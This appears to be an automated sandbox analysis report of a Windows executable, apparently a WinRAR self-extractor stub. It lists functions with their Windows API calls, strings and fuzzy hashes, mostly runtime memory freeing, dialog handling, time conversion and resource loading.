                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE89
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABE9B
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABEAD
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABEBF
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABED1
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABEE3
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABEF5
                • Part of subcall function 00BABE12: _free.LIBCMT ref: 00BABF07
              • _free.LIBCMT ref: 00BAC26C
                • Part of subcall function 00BA84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958), ref: 00BA84F4
                • Part of subcall function 00BA84DE: GetLastError.KERNEL32(00BB3958,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958,00BB3958), ref: 00BA8506
              • _free.LIBCMT ref: 00BAC28E
              • _free.LIBCMT ref: 00BAC2A3
              • _free.LIBCMT ref: 00BAC2AE
              • _free.LIBCMT ref: 00BAC2D0
              • _free.LIBCMT ref: 00BAC2E3
              • _free.LIBCMT ref: 00BAC2F1
              • _free.LIBCMT ref: 00BAC2FC
              • _free.LIBCMT ref: 00BAC334
              • _free.LIBCMT ref: 00BAC33B
              • _free.LIBCMT ref: 00BAC358
              • _free.LIBCMT ref: 00BAC370
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              APIs
              • GetWindow.USER32(?,00000005), ref: 00B9CD51
              • GetClassNameW.USER32(00000000,?,00000800), ref: 00B9CD7D
                • Part of subcall function 00B917AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B8BB05,00000000,.exe,?,?,00000800,?,?,00B985DF,?), ref: 00B917C2
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00B9CD99
              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B9CDB0
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00B9CDC4
              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B9CDED
              • DeleteObject.GDI32(00000000), ref: 00B9CDF4
              • GetWindow.USER32(00000000,00000002), ref: 00B9CDFD
              Similarity
              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
              • String ID: STATIC
              • API String ID: 3820355801-1882779555
              APIs
              • _free.LIBCMT ref: 00BA8EC5
                • Part of subcall function 00BA84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958), ref: 00BA84F4
                • Part of subcall function 00BA84DE: GetLastError.KERNEL32(00BB3958,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958,00BB3958), ref: 00BA8506
              • _free.LIBCMT ref: 00BA8ED1
              • _free.LIBCMT ref: 00BA8EDC
              • _free.LIBCMT ref: 00BA8EE7
              • _free.LIBCMT ref: 00BA8EF2
              • _free.LIBCMT ref: 00BA8EFD
              • _free.LIBCMT ref: 00BA8F08
              • _free.LIBCMT ref: 00BA8F13
              • _free.LIBCMT ref: 00BA8F1E
              • _free.LIBCMT ref: 00BA8F2C
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              Similarity
              • API ID:
              • String ID: ;%u$x%u$xc%u
              • API String ID: 0-2277559157
              APIs
                • Part of subcall function 00B8130B: GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
                • Part of subcall function 00B8130B: SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              • EndDialog.USER32(?,00000001), ref: 00B9AD20
              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B9AD47
              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B9AD60
              • SetWindowTextW.USER32(?,?), ref: 00B9AD71
              • GetDlgItem.USER32(?,00000065), ref: 00B9AD7A
              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B9AD8E
              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B9ADA4
              Similarity
              • API ID: MessageSend$Item$TextWindow$Dialog
              • String ID: LICENSEDLG
              • API String ID: 3214253823-2177901306
              APIs
              • __EH_prolog.LIBCMT ref: 00B89448
              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B8946B
              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B8948A
                • Part of subcall function 00B917AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B8BB05,00000000,.exe,?,?,00000800,?,?,00B985DF,?), ref: 00B917C2
              • _swprintf.LIBCMT ref: 00B89526
                • Part of subcall function 00B8400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B8401D
              • MoveFileW.KERNEL32(?,?), ref: 00B89595
              • MoveFileW.KERNEL32(?,?), ref: 00B895D5
              Similarity
              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
              • String ID: rtmp%d
              • API String ID: 2111052971-3303766350
              APIs
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00B98F38
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B98F59
              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00B98F80
              Similarity
              • API ID: Global$AllocByteCharCreateMultiStreamWide
              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
              • API String ID: 4094277203-4209811716
              APIs
              • __aulldiv.LIBCMT ref: 00B90A9D
                • Part of subcall function 00B8ACF5: GetVersionExW.KERNEL32(?), ref: 00B8AD1A
              • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00B90AC0
              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00B90AD2
              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B90AE3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B90AF3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B90B03
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B90B3D
              • __aullrem.LIBCMT ref: 00B90BCB
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
              • String ID:
              • API String ID: 1247370737-0
              APIs
              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00BAF5A2,?,00000000,?,00000000,00000000), ref: 00BAEE6F
              • __fassign.LIBCMT ref: 00BAEEEA
              • __fassign.LIBCMT ref: 00BAEF05
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00BAEF2B
              • WriteFile.KERNEL32(?,?,00000000,00BAF5A2,00000000,?,?,?,?,?,?,?,?,?,00BAF5A2,?), ref: 00BAEF4A
              • WriteFile.KERNEL32(?,?,00000001,00BAF5A2,00000000,?,?,?,?,?,?,?,?,?,00BAF5A2,?), ref: 00BAEF83
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID:
              • API String ID: 1324828854-0
              • Opcode ID: dd20d31ae4a79c18b770c375e49e847c67cf1eb07d531bca0590326339629a4d
              • Instruction ID: 3f13b54361b2809fd40d4f4a1a1d92a9c6e37abfcfba5d8d382ef6aaf3d79ef7
              • Opcode Fuzzy Hash: dd20d31ae4a79c18b770c375e49e847c67cf1eb07d531bca0590326339629a4d
              • Instruction Fuzzy Hash: DD51F470A042489FDB10CFA8DC81AEEBBF9EF4A300F24455AE561E7291E771E940CB60
              APIs
              • GetTempPathW.KERNEL32(00000800,?), ref: 00B9C54A
              • _swprintf.LIBCMT ref: 00B9C57E
                • Part of subcall function 00B8400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B8401D
              • SetDlgItemTextW.USER32(?,00000066,00BC946A), ref: 00B9C59E
              • _wcschr.LIBVCRUNTIME ref: 00B9C5D1
              • EndDialog.USER32(?,00000001), ref: 00B9C6B2
              Strings
              Similarity
              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
              • String ID: %s%s%u
              • API String ID: 2892007947-1360425832
              • Opcode ID: 5d56e9ceec237e976dcc535b6055d4684c6ae5a565154513603c29495d4016d9
              • Instruction ID: d54e9c5adfee7f1075498b2a8694cb017a34646ba9220ef73043a31af52ff310
              • Opcode Fuzzy Hash: 5d56e9ceec237e976dcc535b6055d4684c6ae5a565154513603c29495d4016d9
              • Instruction Fuzzy Hash: AD417C71900658AADF26EBA0DC85EEA7BFCEB18705F0040F6E509E7161EB759BC4CB50
              APIs
              • ShowWindow.USER32(?,00000000), ref: 00B9964E
              • GetWindowRect.USER32(?,00000000), ref: 00B99693
              • ShowWindow.USER32(?,00000005,00000000), ref: 00B9972A
              • SetWindowTextW.USER32(?,00000000), ref: 00B99732
              • ShowWindow.USER32(00000000,00000005), ref: 00B99748
              Strings
              Similarity
              • API ID: Window$Show$RectText
              • String ID: RarHtmlClassName
              • API String ID: 3937224194-1658105358
              • Opcode ID: 85fbb9191d4be6f9b2f56ca125d11b06ae48f996c8ec9b938f2b31c6dddc3c59
              • Instruction ID: 8015c1dff74210b9e35f7ca5ed46cf7fee697289d862a2fa9c19723ddb51f590
              • Opcode Fuzzy Hash: 85fbb9191d4be6f9b2f56ca125d11b06ae48f996c8ec9b938f2b31c6dddc3c59
              • Instruction Fuzzy Hash: 2F31AE31404204EFCB519FA8DC89B6B7BECEF48701F0445ADFA49AA162CF34DA45CB62
              APIs
                • Part of subcall function 00BABF79: _free.LIBCMT ref: 00BABFA2
              • _free.LIBCMT ref: 00BAC003
                • Part of subcall function 00BA84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958), ref: 00BA84F4
                • Part of subcall function 00BA84DE: GetLastError.KERNEL32(00BB3958,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958,00BB3958), ref: 00BA8506
              • _free.LIBCMT ref: 00BAC00E
              • _free.LIBCMT ref: 00BAC019
              • _free.LIBCMT ref: 00BAC06D
              • _free.LIBCMT ref: 00BAC078
              • _free.LIBCMT ref: 00BAC083
              • _free.LIBCMT ref: 00BAC08E
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction ID: 4fcc351e90ea1ab050f40d5211698c3fde4821716cf46bcbae1cc61e9beb99e3
              • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction Fuzzy Hash: 9611D071548B04FEE620BBB0CC47FCBB7DD6F06700F448895B2A966953DF66F9448A90
              APIs
              • GetLastError.KERNEL32(?,?,00BA20C1,00B9FB12), ref: 00BA20D8
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BA20E6
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BA20FF
              • SetLastError.KERNEL32(00000000,?,00BA20C1,00B9FB12), ref: 00BA2151
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 5cc471f054499336449d8d0879ccb395d5c3ca4848ecc6979e68e4647e093f64
              • Instruction ID: 01df3c7855dd0027d4c18be876bc2d496a3a72a55b053a5dd776a1eb86e35cf5
              • Opcode Fuzzy Hash: 5cc471f054499336449d8d0879ccb395d5c3ca4848ecc6979e68e4647e093f64
              • Instruction Fuzzy Hash: EB01A73260D3116FBB642BB9FC8566A2BC8EB23B7572107AAF631661F1EF918C019144
              Strings
              Similarity
              • API ID:
              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
              • API String ID: 0-1718035505
              • Opcode ID: 3fdf0138efe40850e77e75708ea4d157c7ff1f759875ba4eee92f8e81cf8050f
              • Instruction ID: 647251508a70d673f30a57bfa23c004ee8d9b1c82081141010a48e7a8144b5c8
              • Opcode Fuzzy Hash: 3fdf0138efe40850e77e75708ea4d157c7ff1f759875ba4eee92f8e81cf8050f
              • Instruction Fuzzy Hash: 8501AF716516225B4F706FBB9CC57E623E8EE427163304AFAE502D7350EEE1C881D6A1
              APIs
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B90D0D
                • Part of subcall function 00B8ACF5: GetVersionExW.KERNEL32(?), ref: 00B8AD1A
              • LocalFileTimeToFileTime.KERNEL32(?,00B90CB8), ref: 00B90D31
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B90D47
              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B90D56
              • SystemTimeToFileTime.KERNEL32(?,00B90CB8), ref: 00B90D64
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B90D72
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion
              • String ID:
              • API String ID: 2092733347-0
              • Opcode ID: 76a5eb0e9be2e40aaecdd58e523c8e0d4030324db136d1f2576835e4fc8c94a2
              • Instruction ID: 8e13d99a193ac392acf1ac43135d2ed4017188d0f680ecf1ee3066d68d603d06
              • Opcode Fuzzy Hash: 76a5eb0e9be2e40aaecdd58e523c8e0d4030324db136d1f2576835e4fc8c94a2
              • Instruction Fuzzy Hash: 9C31A979910209EBCB00EFE5D8859EFBBFCFF58700B04456AE955E7210EB30A645CB65
              APIs
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: bb30a5aed10e00ac2f8887f39c6fc25243da3802c4c0479a8ef2fe68e9be5c7a
              • Instruction ID: ffa79292f9ef363b9b0def0844a3187185b4e612ad383bd8772e1df8696b34c4
              • Opcode Fuzzy Hash: bb30a5aed10e00ac2f8887f39c6fc25243da3802c4c0479a8ef2fe68e9be5c7a
              • Instruction Fuzzy Hash: 81217F7160020EBBEF549B18CC81F7B77EDEF50794B2481B8FC09DA211E260ED418691
              APIs
              • GetLastError.KERNEL32(?,00BC0EE8,00BA3E14,00BC0EE8,?,?,00BA3713,00000050,?,00BC0EE8,00000200), ref: 00BA8FA9
              • _free.LIBCMT ref: 00BA8FDC
              • _free.LIBCMT ref: 00BA9004
              • SetLastError.KERNEL32(00000000,?,00BC0EE8,00000200), ref: 00BA9011
              • SetLastError.KERNEL32(00000000,?,00BC0EE8,00000200), ref: 00BA901D
              • _abort.LIBCMT ref: 00BA9023
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: e1ea4ee86f331fb9590e87a5bb085e5e57bd6185dfbfa9d562a40b4875cdc1bd
              • Instruction ID: 9489521c970e39f06c35feeb9aaa258b55155a5c8dd4c81d6e18e5b75c8b6369
              • Opcode Fuzzy Hash: e1ea4ee86f331fb9590e87a5bb085e5e57bd6185dfbfa9d562a40b4875cdc1bd
              • Instruction Fuzzy Hash: D6F0283154C6016FC22233286C0AB2B2AEADFD3760F350696F515D3AA2EF61CD01A020
              APIs
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B9D2F2
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9D30C
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9D31D
              • TranslateMessage.USER32(?), ref: 00B9D327
              • DispatchMessageW.USER32(?), ref: 00B9D331
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B9D33C
              Similarity
              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
              • String ID:
              • API String ID: 2148572870-0
              • Opcode ID: ca7686c0ce601c40279a4babc93c9cdbca39016d877d218a99f0cef0ed5e4ff7
              • Instruction ID: 159f2003abad04aa4e6f47c0d8efc225ad84335b9861623770fd76595a0ca0e3
              • Opcode Fuzzy Hash: ca7686c0ce601c40279a4babc93c9cdbca39016d877d218a99f0cef0ed5e4ff7
              • Instruction Fuzzy Hash: 91F03171A01119ABCF206BA1DC4CEDBBF6DEF51751F404121F506D7051DA748541C7A1
              APIs
              • _wcschr.LIBVCRUNTIME ref: 00B9C435
                • Part of subcall function 00B917AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B8BB05,00000000,.exe,?,?,00000800,?,?,00B985DF,?), ref: 00B917C2
              Strings
              Similarity
              • API ID: CompareString_wcschr
              • String ID: <$HIDE$MAX$MIN
              • API String ID: 2548945186-3358265660
              • Opcode ID: 2d18244fbc66fc3a78529630901a9322bf3867d816bb7a029cd33b4835d005a2
              • Instruction ID: 90b175374e68868b7fd4c3972cf0ddeb4db8f64ca66559051cb4dc932c136ac7
              • Opcode Fuzzy Hash: 2d18244fbc66fc3a78529630901a9322bf3867d816bb7a029cd33b4835d005a2
              • Instruction Fuzzy Hash: 86318272A00649AADF25DE94CC91EEE7BFCEB14300F0044F6FA1596291EBB49FC4CA50
              APIs
              • LoadBitmapW.USER32(00000065), ref: 00B9ADFD
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00B9AE22
              • DeleteObject.GDI32(00000000), ref: 00B9AE54
              • DeleteObject.GDI32(00000000), ref: 00B9AE77
                • Part of subcall function 00B99E1C: FindResourceW.KERNEL32(00B9AE4D,PNG,?,?,?,00B9AE4D,00000066), ref: 00B99E2E
                • Part of subcall function 00B99E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00B9AE4D,00000066), ref: 00B99E46
                • Part of subcall function 00B99E1C: LoadResource.KERNEL32(00000000,?,?,?,00B9AE4D,00000066), ref: 00B99E59
                • Part of subcall function 00B99E1C: LockResource.KERNEL32(00000000,?,?,?,00B9AE4D,00000066), ref: 00B99E64
              Strings
              Similarity
              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
              • String ID: ]
              • API String ID: 142272564-3352871620
              • Opcode ID: 4ce15d7aca9778d5cc94e7bf604fa47ea272a7c80df5c4c7388b88707842a3e5
              • Instruction ID: d8dffd37430eee71362f4609b2b6c5148c9e583dadeb615ce370ca2a7e851a47
              • Opcode Fuzzy Hash: 4ce15d7aca9778d5cc94e7bf604fa47ea272a7c80df5c4c7388b88707842a3e5
              • Instruction Fuzzy Hash: CF01C432540615A7DF1067689C45A7FBBEDEF81B52F1800B9BD00AB292DE728C1586A2
              APIs
                • Part of subcall function 00B8130B: GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
                • Part of subcall function 00B8130B: SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              • EndDialog.USER32(?,00000001), ref: 00B9CCDB
              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B9CCF1
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B9CD05
              • SetDlgItemTextW.USER32(?,00000068), ref: 00B9CD14
              Strings
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: RENAMEDLG
              • API String ID: 445417207-3299779563
              • Opcode ID: b3274aa90a0b446da0d0d8f84ff43bb4fc579255d51e22ed7151f48d23613343
              • Instruction ID: 7a977e5f664e392596b6f3d09c692ba2e7da714f15dcb834943865e840b3a6bf
              • Opcode Fuzzy Hash: b3274aa90a0b446da0d0d8f84ff43bb4fc579255d51e22ed7151f48d23613343
              • Instruction Fuzzy Hash: 540128322852107BEA115F649C48F677FEDEB5A702F104471F345AB0E1CBA19A04CBB5
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BA7573,00000000,?,00BA7513,00000000,00BBBAD8,0000000C,00BA766A,00000000,00000002), ref: 00BA75E2
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BA75F5
              • FreeLibrary.KERNEL32(00000000,?,?,?,00BA7573,00000000,?,00BA7513,00000000,00BBBAD8,0000000C,00BA766A,00000000,00000002), ref: 00BA7618
              Strings
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 2e01212982ad1d11e8eeb2844a461a5b2ffbc85fb0787a1078a4498feb25c9c9
              • Instruction ID: dd9db2abadce15de72582fb17875972d6e2d4657770659aabb2122353b81e272
              • Opcode Fuzzy Hash: 2e01212982ad1d11e8eeb2844a461a5b2ffbc85fb0787a1078a4498feb25c9c9
              • Instruction Fuzzy Hash: B7F03130A58518BBDB15AB58DC09BEDBBF9EF04711F0041A9E805A3160DFB09A41CA54
              APIs
                • Part of subcall function 00B90085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B900A0
                • Part of subcall function 00B90085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8EB86,Crypt32.dll,00000000,00B8EC0A,?,?,00B8EBEC,?,?,?), ref: 00B900C2
              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B8EB92
              • GetProcAddress.KERNEL32(00BC81C0,CryptUnprotectMemory), ref: 00B8EBA2
              Strings
              Similarity
              • API ID: AddressProc$DirectoryLibraryLoadSystem
              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
              • API String ID: 2141747552-1753850145
              • Opcode ID: 15f56f3abbd074e4b0f802c27b628d86d2408f093b16b8ca05a061ac9e6d6c67
              • Instruction ID: e38f44019b9c6676da4ff064683e910974c8b9c9df93baaf1fe52a543260821d
              • Opcode Fuzzy Hash: 15f56f3abbd074e4b0f802c27b628d86d2408f093b16b8ca05a061ac9e6d6c67
              • Instruction Fuzzy Hash: 06E04F70845741AFCB20AF349848B96BAE49F14B00B04889DE4E6D31A0DAF5D5408B50
              APIs
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: d5d10432d47d5ac4f34d20db624f99934601ea57b33b4dd13096d6e6c0ba1b9d
              • Instruction ID: 082aebdec0e79de3915a516cc759345b51593741bcad929700b3887da70ee2fb
              • Opcode Fuzzy Hash: d5d10432d47d5ac4f34d20db624f99934601ea57b33b4dd13096d6e6c0ba1b9d
              • Instruction Fuzzy Hash: D2418132A483049FDB24DF78C881A9EB7EAEF8A714B1545E9E515EB351DB31ED01CB80
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 00BAB619
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BAB63C
                • Part of subcall function 00BA8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BAC13D,00000000,?,00BA67E2,?,00000008,?,00BA89AD,?,?,?), ref: 00BA854A
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BAB662
              • _free.LIBCMT ref: 00BAB675
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BAB684
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: 07a1d5f5a8eebbc459892090682b36fbd2757b8a4f07f25c0febcf025c842cf2
              • Instruction ID: f071f99a91e9119c27ae0dfdfe0147495f492433157ba17de75e6a64649a8d76
              • Opcode Fuzzy Hash: 07a1d5f5a8eebbc459892090682b36fbd2757b8a4f07f25c0febcf025c842cf2
              • Instruction Fuzzy Hash: FF01A772609615BF632156BE6C8CC7BAAEDDEC7FA031502A9FD14D3216DFA0CD4191B0
              APIs
              • GetLastError.KERNEL32(?,00BC0EE8,00000200,00BA895F,00BA58FE,?,?,?,?,00B8D25E,?,030F3810,00000063,00000004,00B8CFE0,?), ref: 00BA902E
              • _free.LIBCMT ref: 00BA9063
              • _free.LIBCMT ref: 00BA908A
              • SetLastError.KERNEL32(00000000,00BB3958,00000050,00BC0EE8), ref: 00BA9097
              • SetLastError.KERNEL32(00000000,00BB3958,00000050,00BC0EE8), ref: 00BA90A0
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: 956a7e33a6e329ed9c9bb00f22c9f409b17ee099a8f6870e1415b44354241fa3
              • Instruction ID: f4d686a25780ffaf1d08ebd2784988b7e3947431f6f2831335f17f4ad6b6d061
              • Opcode Fuzzy Hash: 956a7e33a6e329ed9c9bb00f22c9f409b17ee099a8f6870e1415b44354241fa3
              • Instruction Fuzzy Hash: 7001F43254DA006B933237396C85A2B26DEDFD37F132002A5F61A93262EFB4CC01A160
              APIs
                • Part of subcall function 00B90A41: ResetEvent.KERNEL32(?), ref: 00B90A53
                • Part of subcall function 00B90A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B90A67
              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B9078F
              • CloseHandle.KERNEL32(?,?), ref: 00B907A9
              • DeleteCriticalSection.KERNEL32(?), ref: 00B907C2
              • CloseHandle.KERNEL32(?), ref: 00B907CE
              • CloseHandle.KERNEL32(?), ref: 00B907DA
                • Part of subcall function 00B9084E: WaitForSingleObject.KERNEL32(?,000000FF,00B90A78,?), ref: 00B90854
                • Part of subcall function 00B9084E: GetLastError.KERNEL32(?), ref: 00B90860
              Similarity
              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
              • String ID:
              • API String ID: 1868215902-0
              • Opcode ID: e06c1522dd2d94e7c82821e76b11a12329163abb599e7898d1e6a139b07480e5
              • Instruction ID: 5196c47fa8ce4c1dba496483251c4e5899e63d3d45091971eb77ee40bd50c72e
              • Opcode Fuzzy Hash: e06c1522dd2d94e7c82821e76b11a12329163abb599e7898d1e6a139b07480e5
              • Instruction Fuzzy Hash: 2C019271544B04EFCB21AB69DC84FC6BBE9FF48B10F400669F15A82160CBB57A44CB90
              APIs
              • _free.LIBCMT ref: 00BABF28
                • Part of subcall function 00BA84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958), ref: 00BA84F4
                • Part of subcall function 00BA84DE: GetLastError.KERNEL32(00BB3958,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958,00BB3958), ref: 00BA8506
              • _free.LIBCMT ref: 00BABF3A
              • _free.LIBCMT ref: 00BABF4C
              • _free.LIBCMT ref: 00BABF5E
              • _free.LIBCMT ref: 00BABF70
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 4afa0989b66edc88bfef39af5c594fc374adea94e9a1783e73b05a0cb7926fcc
              • Instruction ID: 61ef315e70a75c300fb562e8e80bd06cf62501aefa33d9e477fc75d6c74d06f0
              • Opcode Fuzzy Hash: 4afa0989b66edc88bfef39af5c594fc374adea94e9a1783e73b05a0cb7926fcc
              • Instruction Fuzzy Hash: DCF0123250C201AB9620EB68EEC6C5A73DAFA067107684D99F029D7E21CF71FC808A54
              APIs
              • _free.LIBCMT ref: 00BA807E
                • Part of subcall function 00BA84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958), ref: 00BA84F4
                • Part of subcall function 00BA84DE: GetLastError.KERNEL32(00BB3958,?,00BABFA7,00BB3958,00000000,00BB3958,00000000,?,00BABFCE,00BB3958,00000007,00BB3958,?,00BAC3CB,00BB3958,00BB3958), ref: 00BA8506
              • _free.LIBCMT ref: 00BA8090
              • _free.LIBCMT ref: 00BA80A3
              • _free.LIBCMT ref: 00BA80B4
              • _free.LIBCMT ref: 00BA80C5
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 7cc0d71f5a345b1e6005c42350c039a3341886b81757a611252acd3a30ce77f1
              • Instruction ID: 4b6a7758974736e69ee36af1ac0c4584897bb6c9a5f650664287806420570cdf
              • Opcode Fuzzy Hash: 7cc0d71f5a345b1e6005c42350c039a3341886b81757a611252acd3a30ce77f1
              • Instruction Fuzzy Hash: 0DF03A748055658F97117F19BC814853BA6F71A7203284E9AF4119FF70CF718892AFD1
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00BA76FD
              • _free.LIBCMT ref: 00BA77C8
              • _free.LIBCMT ref: 00BA77D2
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Users\user\Desktop\file.exe
              • API String ID: 2506810119-4010620828
